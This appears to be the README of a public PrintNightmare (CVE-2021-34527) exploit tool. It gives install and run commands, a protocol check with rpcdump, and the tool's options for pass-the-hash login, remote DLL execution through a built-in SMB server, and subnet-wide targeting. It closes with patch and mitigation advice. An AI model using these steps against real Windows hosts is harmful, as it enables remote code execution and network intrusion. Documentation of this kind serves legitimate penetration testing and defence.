This version of the PrintNightmare exploit is based on the code created by Cube0x0, with the following features:
- Ability to target multiple hosts.
- Built-in SMB server for payload delivery, removing the need for open file shares.
- Exploit includes both
MS-RPRN
&MS-PAR
protocols (define in CMD args). - Implements @gentilkiwi's UNC bypass technique.
Before running, install the latest version of impacket:
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 setup install
git clone https://github.com/m8sec/CVE-2021-34527
cd CVE-2021-34527
python3 CVE-2021-34527.py -h
Impacket's rpcdump.py
can be used to check for MS-PAR
and MS-RPRN
protocols:
>> rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
Alternatively, byt3bl33d3r's scanner ItWasAllADream can be used to scan targets and validate the PrintNightmare RCE vulnerability.
-v VERBOSE Enable verbose logging from SMB server
-t TIMEOUT Connection timeout
Authentication:
-u USERNAME Set username
-H HASH, -hashes Use NTLM Hash for authentication
-p PASSWORD Set password
-d DOMAIN Set domain
--local-auth Authenticate to target host, no domain
DLL Execution:
-dll DLL Path to local DLL file to execute "beacon.dll"
--remote-dll REMOTE_DLL Remote dll "\\192.168.1.25\Share\beacon.dll"
-share SHARE Set local SMB share name
--local-ip LOCAL_IP Set local IP (defaults to primary interface)
Target(s):
-pDriverPath PDRIVERPATH Define Driver path. Example 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
-port [destination port] Destination port to connect to SMB Server
-proto {MS-RPRN,MS-PAR} Target protocol (Default=MS-RPRN)
target 192.168.2.2, target.txt, 10.0.0.0/24 (positional)
Microsoft has released several patches for PrintNightmare, the latest being on Patch Tuesday of September 2021. This addressed the underlying vulnerability and later workarounds discovered. For more information, visit Microsoft's official guidance:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
Additional strategies for mitigating this vulnerability include:
- Disabling the Print Spooler service on non-essential systems.
- Disable inbound remote printing through Group Policy
- @cube0x0 - for the Python exploit code and his contributions to the impacket project.
- @edwardzpeng & @lxf02942370- for the initial discovery and exploit of PrintNightmare.